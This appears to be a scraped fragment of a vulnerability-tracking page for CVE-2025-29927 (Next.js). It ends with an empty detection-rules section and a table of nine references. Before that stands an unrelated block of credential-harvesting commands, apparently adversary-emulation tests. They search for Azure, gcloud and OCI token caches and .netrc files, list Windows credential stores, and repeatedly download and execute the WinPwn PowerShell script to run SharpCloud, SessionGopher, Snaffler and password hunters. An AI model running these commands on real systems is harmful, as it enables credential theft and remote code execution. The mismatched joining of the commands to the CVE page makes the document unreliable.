find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-29927 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/vercel/next.js/releases/tag/v12.3.5 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/vercel/next.js/releases/tag/v13.5.9 |
| openwall.com |
NVD API
Mailing List
Third Party Advisory
|
http://www.openwall.com/lists/oss-security/2025/03/23/3 |
| openwall.com |
NVD API
Mailing List
|
http://www.openwall.com/lists/oss-security/2025/03/23/4 |
| security.netapp.com |
NVD API
Third Party Advisory
|
https://security.netapp.com/advisory/ntap-20250328-0002/ |